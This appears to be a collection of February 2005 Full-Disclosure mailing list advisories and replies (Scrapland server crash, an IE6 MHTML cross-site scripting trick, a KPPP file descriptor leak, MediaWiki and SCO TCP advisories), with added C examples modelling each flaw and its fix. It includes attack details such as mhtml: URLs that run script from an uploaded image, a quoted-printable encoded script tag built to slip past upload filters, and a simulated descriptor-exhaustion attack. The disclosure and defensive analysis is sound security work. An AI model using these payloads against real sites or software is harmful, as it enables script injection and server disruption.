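               count_badchars(buf, len, BADBLUE_BADCHARS, BADBLUE_NBAD),
               buf[off], off);
}

int main(void)
{
    report("posted decoder stub", POSTED_STUB, sizeof POSTED_STUB);
    report("raw sample", RAW_SAMPLE, sizeof RAW_SAMPLE);
    return 0;
}
```

Run it against the full decoded payload, not only the stub: an encoder guarantees the encoded body is clean, but the decoder stub itself is sent raw and has to be checked separately.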
[Full-Disclosure] Server termination in Scrapland 1.0
### Luigi Auriemma

Application:  Scrapland
              http://www.scrapland.com
Versions:     <= 1.0
Platforms:    Windows
Bug:          server termination
Exploitation: remote, versus server (partially in-game)
Date:         28 Feb 2005
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    http://aluigi.altervista.org

###

1) Introduction
2) Bug
3) The Code
4) Fix

###

===
1) Introduction
===

Scrapland is the known game developed by MercurySteam Entertainment (http://www.mercurysteam.com) with the creative support of American McGee (http://www.americanmcgee.com). The game was released at the beginning of 2005.

###

==
2) Bug
==

The main problem of the game is that the server terminates after any error instead of simply showing the error message in the game console and continuing its work. This lets an attacker easily crash a Scrapland game server in many ways; some of them are:

- sizeSSize: the game uses 8-bit numbers to specify the size of the text strings inside the packets. These 8-bit numbers are handled as signed integers, so any value bigger than 127 causes the server error.
- nonexistent model: if the client uses a model (like engine, pilot or player) not available on the server, the server terminates saying that the model specified by the client has not been found.
- newpos=size: another type of error.
- access violation caused by the reception of two partial packets.

If the server is full, it is not possible to terminate it.

###

===
3) The Code
===

http://aluigi.altervista.org/poc/scrapboom.zip

###

==
4) Fix
==

No fix. No reply from the developers.

###

---
Luigi Auriemma
http://aluigi.altervista.org
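The first bullet (an 8-bit length read as a signed integer) and the general complaint (any error kills the server) are the two things worth seeing in code. The following is an added illustration in C; it is not Scrapland code and not from scrapboom.zip, whose packet layout is not described here. The packets are constructed for the example: one length byte followed by that many string bytes.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed packets (not from scrapboom.zip): one size byte, then the string. */
static uint8_t short_pkt[] = { 5, 'h', 'e', 'l', 'l', 'o' }; /* size 5, fine   */
static uint8_t long_pkt[1 + 128];                           /* size 0x80 = 128 */
static uint8_t lying_pkt[1 + 16];                           /* claims 200, has 16 */

static void build_packets(void)
{
    long_pkt[0] = 0x80;
    memset(long_pkt + 1, 'A', 128);
    lying_pkt[0] = 200;
    memset(lying_pkt + 1, 'B', 16);
}

/* Models the bug described above: the 8-bit size is treated as signed, so
 * 0x80..0xFF read as -128..-1 and every such packet takes the error path. */
int read_string_signed(const uint8_t *pkt, size_t pktlen, char *out, size_t outcap)
{
    if (pktlen < 1) return -1;
    signed char size = (signed char)pkt[0];
    if (size < 0 || (size_t)size > pktlen - 1 || (size_t)size >= outcap)
        return -1;
    memcpy(out, pkt + 1, (size_t)size);
    out[size] = '\0';
    return size;
}

/* Corrected: unsigned size, checked against the bytes actually received and
 * against the destination buffer; a bad packet is an error return, not a
 * reason to exit the server process. */
int read_string(const uint8_t *pkt, size_t pktlen, char *out, size_t outcap)
{
    if (pktlen < 1) return -1;
    uint8_t size = pkt[0];
    if ((size_t)size > pktlen - 1 || (size_t)size >= outcap) return -1;
    memcpy(out, pkt + 1, size);
    out[size] = '\0';
    return size;
}

/* Per-packet dispatch that keeps the server alive: counts rejected packets so
 * the caller can log them and carry on serving everyone else. */
static int demo(int (*reader)(const uint8_t *, size_t, char *, size_t))
{
    build_packets();
    const uint8_t *pkts[] = { short_pkt, long_pkt, lying_pkt };
    const size_t lens[]   = { sizeof short_pkt, sizeof long_pkt, sizeof lying_pkt };
    char name[256];
    int rejected = 0;
    for (size_t i = 0; i < 3; i++)
        if (reader(pkts[i], lens[i], name, sizeof name) < 0)
            rejected++;      /* log and move on; never exit() here */
    return rejected;
}

int demo_signed(void)   { return demo(read_string_signed); } /* 2: 128-byte and lying */
int demo_unsigned(void) { return demo(read_string); }        /* 1: only the lying one */
```

With the signed reader a perfectly valid 128-byte string is rejected along with the genuinely malformed packet; with the unsigned, bounds-checked reader only the packet whose size byte overstates the payload is refused, and in neither case does the dispatcher terminate.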
Re: [Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Dear bitlance winter,

Using MHTML to bypass content filtering for scripting was at least reported here by offtopic, as well as a few more tricks. You may want to read this:

offtopic, 3APA3A. Bypassing client application protection techniques
http://www.security.nnov.ru/advisories/bypassing.asp

and this

3APA3A. Bypassing content filtering whitepaper
http://www.security.nnov.ru/advisories/content.asp

--Monday, February 28, 2005, 6:11:31 PM, you wrote to full-disclosure@lists.netsys.com:

bw Hi, LIST.
bw
bw subject:
bw
bw Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML Documents
bw
bw NOTE:
bw
bw This bug had been provided by an unknown person on his site.
bw This bug has been widely known in Japan since August, 2004.
bw (This news was reported.)
bw Now his site is closed.
bw Some engineers prevented this bug. They are maintaining Web services.
bw Wiki, Webmail, Blog, BBS, those might be dangerous.
bw
bw First:
bw
bw I want to show the following first. Please check it out using IE on XPSP2.
bw The cat is here.
bw http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg
bw And the cat is a script kitty.
bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg
bw You see? Executing JavaScript? Ok.
bw If you are using old IE or Windows, try this one.
bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg.mhtml
bw Confirmed?
bw
bw Second:
bw
bw What happens to us?
bw Please check it out.
bw http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt
bw or same file,
bw http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt
bw This is a test message which demonstrates sending e-mail
bw in HTML format according to RFC 2557.
bw And check out please.
bw mhtml:http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt
bw or same file,
bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt
bw
bw Third:
bw
bw Then we can change Content-Transfer-Encoding:
bw from '7bit' to 'quoted-printable'.
bw Check it out please.
bw http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt
bw - - q2.txt --
bw Content-Type: text/html; charset=us-ascii
bw Content-Transfer-Encoding: quoted-printable
bw
bw =3C!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 3.2//EN=3E
bw =3CHTML=3E
bw =3CHEAD=3E=3CTITLE=3ETest message no. 3=3C/TITLE=3E
bw =3C/HEAD=3E
bw =3CBODY=3E
bw =3CH1=3EThis is test message no. 3=3C/H1=3E
bw =3CH2=3EHere comes the red test image:=3C/H2=3E
bw =3CIMG
bw SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/red-test-image.gif;
bw BORDER=3D0 HEIGHT=3D32 WIDTH=3D117
bw ALT=3Dred test image=3E
bw =3CH2=3EHere comes the yellow test image:=3C/H2=3E
bw =3CIMG
bw SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/yellow-test-image.gif;
bw BORDER=3D0 HEIGHT=3D32 WIDTH=3D152
bw ALT=3Dyellow test image=3E
bw =3CP=3EThis is the last line of this test message.
bw =3C/BODY=3E=3C/HTML=3E
bw - - q2.txt --
bw Where is the HTML TAG?
bw Do you know how to sanitise?
bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt
bw The malicious code would be inserted by a malicious user,
bw on Blog, Wiki, BBS with file uploader, etc.
bw JPEG files or GIF files are also poisoned.
bw There is a possible XSS issue on Windows XPSP2 IE6 via MHTML.
bw
bw Reference:
bw
bw Using HTML in E-mail
bw http://www.dsv.su.se/jpalme/ietf/mhtml.html
bw MIME Encapsulation of Aggregate HTML Documents (MHTML)
bw http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cdosys/html/_cdosys_mime_encapsulation_of_aggregate_html_documents_mhtml_.asp
bw RFC 2045 - Multipurpose Internet Mail Extensions (MIME) Part One: Format of
bw Internet Message Bodies
bw http://www.faqs.org/rfcs/rfc2045.html
bw ===
bw Sorry my bad English.
bw Best Regards.
bw ===
bw --
bw bitlance winter

-- ~/ZARAZA
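The "Where is the HTML TAG?" question is the whole issue: an upload filter that searches the stored bytes for a literal tag never sees one, because mhtml: decodes the quoted-printable body before rendering it. Added example in C (not from either poster and not from the 3APA3A papers): a minimal RFC 2045 quoted-printable decoder, a constructed MIME part (not bitlance's q2.txt) carrying =3Cscript=3E, and the same naive filter run once on the raw bytes and once on the decoded body.

```c
#include <stddef.h>
#include <string.h>

/* Constructed MHTML body part (not the poster's q2.txt): the same trick, a
 * quoted-printable encoded <script> tag that contains no literal '<'. */
const char QP_PART[] =
    "Content-Type: text/html; charset=us-ascii\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
    "=3Cscript=3Ealert(1)=3C/script=3E\r\n";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode RFC 2045 quoted-printable: "=XX" -> one byte, "=\r\n" or "=\n" soft
 * line break -> nothing, everything else copied through. Returns decoded length. */
size_t qp_decode(const char *in, size_t inlen, char *out, size_t outcap)
{
    size_t o = 0;
    for (size_t i = 0; i < inlen && o + 1 < outcap; i++) {
        if (in[i] != '=') { out[o++] = in[i]; continue; }
        if (i + 1 < inlen && in[i + 1] == '\n') { i += 1; continue; }
        if (i + 2 < inlen && in[i + 1] == '\r' && in[i + 2] == '\n') { i += 2; continue; }
        if (i + 2 < inlen) {
            int hi = hexval(in[i + 1]), lo = hexval(in[i + 2]);
            if (hi >= 0 && lo >= 0) { out[o++] = (char)(hi * 16 + lo); i += 2; continue; }
        }
        out[o++] = '=';                 /* malformed escape: keep it literally */
    }
    out[o] = '\0';
    return o;
}

/* The kind of check a wiki/BBS upload filter might run on the stored bytes. */
int looks_like_html(const char *s)
{
    return strstr(s, "<script") != NULL || strstr(s, "<SCRIPT") != NULL;
}

/* Body starts after the blank line that ends the MIME headers. */
const char *mime_body(const char *part)
{
    const char *p = strstr(part, "\r\n\r\n");
    return p ? p + 4 : part;
}

/* 1 if the filter fires on the encoded upload as stored, 0 if it is blind. */
int filter_catches_raw(void) { return looks_like_html(QP_PART); }

/* Decoded length of the constructed body, for checking the decoder itself. */
size_t decoded_body_len(void)
{
    char buf[256];
    const char *body = mime_body(QP_PART);
    return qp_decode(body, strlen(body), buf, sizeof buf);
}

/* 1 if the filter fires on what the browser will actually render. */
int filter_catches_decoded(void)
{
    char buf[256];
    const char *body = mime_body(QP_PART);
    qp_decode(body, strlen(body), buf, sizeof buf);
    return looks_like_html(buf);
}
```

The practical consequence is the one the thread reaches: a server-side filter has to decode every transfer encoding the client might apply (and strip or refuse the mhtml: reachable headers) before it inspects content, or refuse to host untrusted files on the same origin as the application.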
[Full-Disclosure] iDEFENSE Security Advisory 02.28.05: KPPP Privileged File Descriptor Leak Vulnerability
KPPP Privileged File Descriptor Leak Vulnerability

iDEFENSE Security Advisory 02.28.05
www.idefense.com/application/poi/display?id=208&type=vulnerabilities
February 28, 2005

I. BACKGROUND

KPPP is a dialer and front end for pppd. It allows for interactive script generation and network setup. More information is available at:
http://docs.kde.org/en/3.3/kdenetwork/kppp/

II. DESCRIPTION

Local exploitation of a privileged file descriptor leak in KPPP can allow attackers to hijack a system's domain name resolution function.

The vulnerability specifically exists due to kppp's failure to properly close privileged file descriptors. Typically, KPPP is installed setuid root and uses privilege separation to allow only certain functions of the PPP dialer to execute with elevated privileges. Communication between the privileged portion and the non-privileged portion of kppp is done over a domain socket which does not properly get closed. A fix for a similar vulnerability was introduced to the kppp code base in 1998, as can be seen below:

    // close file descriptors
    for (int fd = 3; fd < 20; fd++)
        close(fd);

This fix may be easily bypassed if an attacker opens 17 file descriptors before executing kppp. The loop will execute, closing the previously opened file descriptors and leaving the privileged file descriptor used to talk to the privileged component of kppp open for attackers. KPPP may be abused to gain read and write access to /etc/hosts and /etc/resolv.conf, thus giving attackers complete control over a system's domain resolution capabilities.

III. ANALYSIS

Exploitation allows local attackers to gain control over a system's domain name resolution function. Exploitation is trivial and allows an attacker to write to the two files typically providing the configuration for domain name resolution. Modifications of /etc/resolv.conf will allow the attacker to specify a malicious domain server which may return arbitrary responses to domain name lookups. Modifications to /etc/hosts will cause hostname resolution redirection without the need for an external domain server. This class of attack can be used to aid in phishing and social engineering attempts.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in KPPP 2.1.2. The vendor has confirmed that KPPP as included in KDE 3.1.5 and prior is affected. KDE 3.2.x and newer are not affected.

Note that some Linux distributions which come with KPPP, such as Red Hat Linux, use a wrapper for executing X11 applications that require root privileges. This wrapper safely closes all file descriptors in the executed application.

V. WORKAROUND

As a workaround, temporarily remove the setuid bit from KPPP and manually gain root privileges before executing KPPP:

    chmod -s /usr/sbin/kppp

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:
http://www.kde.org/info/security/advisory-20050228-1.txt

A patch for KDE 3.1 is available from ftp://ftp.kde.org/pub/kde/security_patches :

    0e999df54963edd5f565b6d541f408d9  post-3.1.5-kdenetwork.diff

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-0205 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

02/09/2005  Initial vendor notification
02/09/2005  Initial vendor response
02/28/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
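The quoted 1998 loop fails because its upper bound is a constant, and an attacker controls how many descriptors are already in use when a setuid program starts. Added example (not kppp code): the fixed-range loop beside a closer that walks /proc/self/fd (falling back to sysconf(_SC_OPEN_MAX) where /proc is absent), plus a simulation of the attack the advisory describes: 17 descriptors pre-opened so that the next one the program opens lands at 20 or above. /dev/null stands in for kppp's privileged domain socket; the /proc walk is Linux-specific.

```c
#include <dirent.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* The 1998 fix quoted in the advisory: only fds 3..19 are ever closed. */
void close_fds_fixed_range(void)
{
    for (int fd = 3; fd < 20; fd++)
        close(fd);
}

/* Close every descriptor >= lowfd, whatever its number. On Linux the list
 * of open descriptors is read from /proc/self/fd, so the cost is proportional
 * to what is actually open, not to RLIMIT_NOFILE. */
void close_fds_from(int lowfd)
{
    DIR *d = opendir("/proc/self/fd");
    if (d) {
        int skip = dirfd(d);            /* do not close the directory we are reading */
        struct dirent *e;
        while ((e = readdir(d)) != NULL) {
            char *end;
            long fd = strtol(e->d_name, &end, 10);
            if (*end == '\0' && fd >= lowfd && fd != skip)
                close((int)fd);
        }
        closedir(d);
        return;
    }
    /* No /proc: fall back to the descriptor limit rather than a magic 20. */
    long max = sysconf(_SC_OPEN_MAX);
    for (long fd = lowfd; fd < (max > 0 ? max : 1024); fd++)
        close((int)fd);
}

/* 1 if fd is still open (the leak), 0 once it has been closed. */
int fd_is_open(int fd) { return fcntl(fd, F_GETFD) != -1; }

/* Simulate the attack: 17 descriptors are opened "by the attacker" before the
 * privileged one is created, pushing it to number 20 or higher. Then run one
 * of the closers and report whether the privileged descriptor survived. */
int privileged_fd_leaks(void (*closer)(void))
{
    int attacker[17];
    for (int i = 0; i < 17; i++)
        attacker[i] = open("/dev/null", O_RDONLY);
    int privileged = open("/dev/null", O_RDWR);   /* stands in for the domain socket */
    if (privileged < 20) return -1;                /* setup failed; nothing to show */

    closer();

    int leaked = fd_is_open(privileged);
    if (leaked) close(privileged);                 /* tidy up for the caller */
    return leaked;
}

static void close_all_from_three(void) { close_fds_from(3); }

int demo_fixed_range(void) { return privileged_fd_leaks(close_fds_fixed_range); } /* 1 */
int demo_proc_walk(void)   { return privileged_fd_leaks(close_all_from_three); }  /* 0 */
```

Closing by enumeration is one half of the fix; the other is to open the privileged socket with FD_CLOEXEC (or mark it with fcntl(fd, F_SETFD, FD_CLOEXEC)) so that it cannot survive into any program the dialer later executes regardless of its number.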
[Full-Disclosure] [ GLSA 200502-33 ] MediaWiki: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200502-33
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: MediaWiki: Multiple vulnerabilities
      Date: February 28, 2005
      Bugs: #80729, #82954
        ID: 200502-33

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

MediaWiki is vulnerable to cross-site scripting, data manipulation and security bypass attacks.

Background
==========

MediaWiki is collaborative editing software, used by big projects like Wikipedia.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  www-apps/mediawiki          < 1.3.11                    >= 1.3.11

Description
===========

A security audit of the MediaWiki project discovered that MediaWiki is vulnerable to several cross-site scripting and cross-site request forgery attacks, and that the image deletion code does not sufficiently sanitize input parameters.

Impact
======

By tricking a user into loading a carefully crafted URL, a remote attacker could hijack sessions and authentication cookies, inject malicious script code that will be executed in a user's browser session in the context of the vulnerable site, or use JavaScript-submitted forms to perform restricted actions. Using the image deletion flaw, it is also possible for authenticated administrators to delete arbitrary files via directory traversal.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MediaWiki users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mediawiki-1.3.11"

References
==========

  [ 1 ] Secunia Advisory SA14125
        http://secunia.com/advisories/14125/
  [ 2 ] CAN-2005-0534
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0534
  [ 3 ] CAN-2005-0535
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0535
  [ 4 ] CAN-2005-0536
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0536

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200502-33.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
Re: [Full-Disclosure] client - server
On Monday, 28.02.2005, 02:43 +0100, Matteo Giannone wrote:

Hi list, what information can a server get about a client running M$ Windows XP? I cannot access a website because I have been banned and I'd like to understand how they recognize me for sure.

[...]

use a sniffer and find out
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : A vulnerability in TCP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SCO Security Advisory

Subject:                OpenServer 5.0.6 OpenServer 5.0.7 : A vulnerability in TCP
Advisory number:        SCOSA-2005.3
Issue date:             2005 February 28
Cross reference:        sr890248 fz529385 erg712599 CAN-2004-0230
______________________________________________________________________________

1. Problem Description

    TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP.

    Paul Watson performed a statistical analysis of this attack when the ISN is not known and has pointed out that such an attack could be viable when specifically taking into account the TCP Window size. He has also created a proof-of-concept tool demonstrating the practicality of the attack. The National Infrastructure Security Co-Ordination Centre (NISCC) has published an advisory summarizing Paul Watson's analysis in NISCC Vulnerability Advisory 236929.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0230 to this issue.

2. Vulnerable Supported Versions

    System                  Binaries
    ----------------------------------------------------------------------
    OpenServer 5.0.6        TCP driver
    OpenServer 5.0.7        TCP driver

3. Solution

    The proper solution is to install the latest packages.

4. OpenServer 5.0.7

  4.1 Location of Fixed Binaries

    ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3

  4.2 Verification

    MD5 (VOL.000.000) = 0f3182ee23d7bd90359d7ac0973dd44e

    md5 is available for download from ftp://ftp.sco.com/pub/security/tools

  4.3 Installing Fixed Binaries

    Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory
    2) Run the custom command, specify an install from media images, and specify the /tmp directory as the location of the images.

5. OpenServer 5.0.6

  5.1 Location of Fixed Binaries

    ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3

  5.2 Verification

    MD5 (VOL.000.000) = 0f3182ee23d7bd90359d7ac0973dd44e

    md5 is available for download from ftp://ftp.sco.com/pub/security/tools

  5.3 Installing Fixed Binaries

    Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory
    2) Run the custom command, specify an install from media images, and specify the /tmp directory as the location of the images.

6. References

    Specific references for this advisory:
        http://www.uniras.gov.uk/vuls/2004/236929/index.htm
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230
        http://www.us-cert.gov/cas/techalerts/TA04-111A.html

    SCO security resources:
        http://www.sco.com/support/security/index.html

    SCO security advisories via email
        http://www.sco.com/support/forums/security.html

    This security fix closes SCO incidents sr890248 fz529385 erg712599.

7. Disclaimer

    SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products.

8. Acknowledgments

    SCO would like to thank The National Infrastructure Security Co-Ordination Centre (NISCC), Paul Watson and Tim Newsham.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (SCO/UNIX_SVR5)

iD8DBQFCIy37aqoBO7ipriERAqc3AJ9IwDOx3iRiSmJNqbHonAiL/MahBACcCLTn
BffHZGatoqplBgcjoEgAvcA=
=eNiU
-----END PGP SIGNATURE-----
Re: [Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Dear 3APA3A.

Thank you for your excellent information.

offtopic, 3APA3A. Bypassing client application protection techniques
http://www.security.nnov.ru/advisories/bypassing.asp
3APA3A. Bypassing content filtering whitepaper
http://www.security.nnov.ru/advisories/content.asp

These advisories are very very cool. ;)

By the way, I have checked out these test descriptions.
http://www.security.nnov.ru/files/opossum/test4.gif
http://www.security.nnov.ru/files/opossum/test5.gif

IE6 on Windows XPSP2 introduces a new setting under Tools -> Internet Options -> Security settings where we can choose to "Disable" "Open files based on content, not file extension". Choosing "Disable" will make Internet Explorer respect the Content-Type at least in some circumstances. When we choose "Disable", neither opossum/test4.gif nor opossum/test5.gif is dangerous. But the script kitty is still dangerous. I am confused. :(
(Unfortunately, this setting is not disabled by default in the Internet Zone.)

Thank you.

Reference:

Setting Changes in Service Pack 2 #MIME Sniffing File-Type Elevation
http://www.microsoft.com/resources/documentation/ie/6/all/reskit/en-us/appendix.mspx
Content Types - Web Developer Boot Camp
http://bclary.com/2004/09/26/boot-camp-content-type
FILE SIGNATURES TABLE
http://www.garykessler.net/library/file_sigs.htm

--
bitlance winter
[Full-Disclosure] Seeking anyone harmed by PivX Solutions
Regarding PivX Solutions:

I would like to make contact with anyone who has been harmed by PivX Solutions. If you have been harmed by PivX Solutions, please contact me as soon as possible.

Thanks.

Jason Coombs
[EMAIL PROTECTED]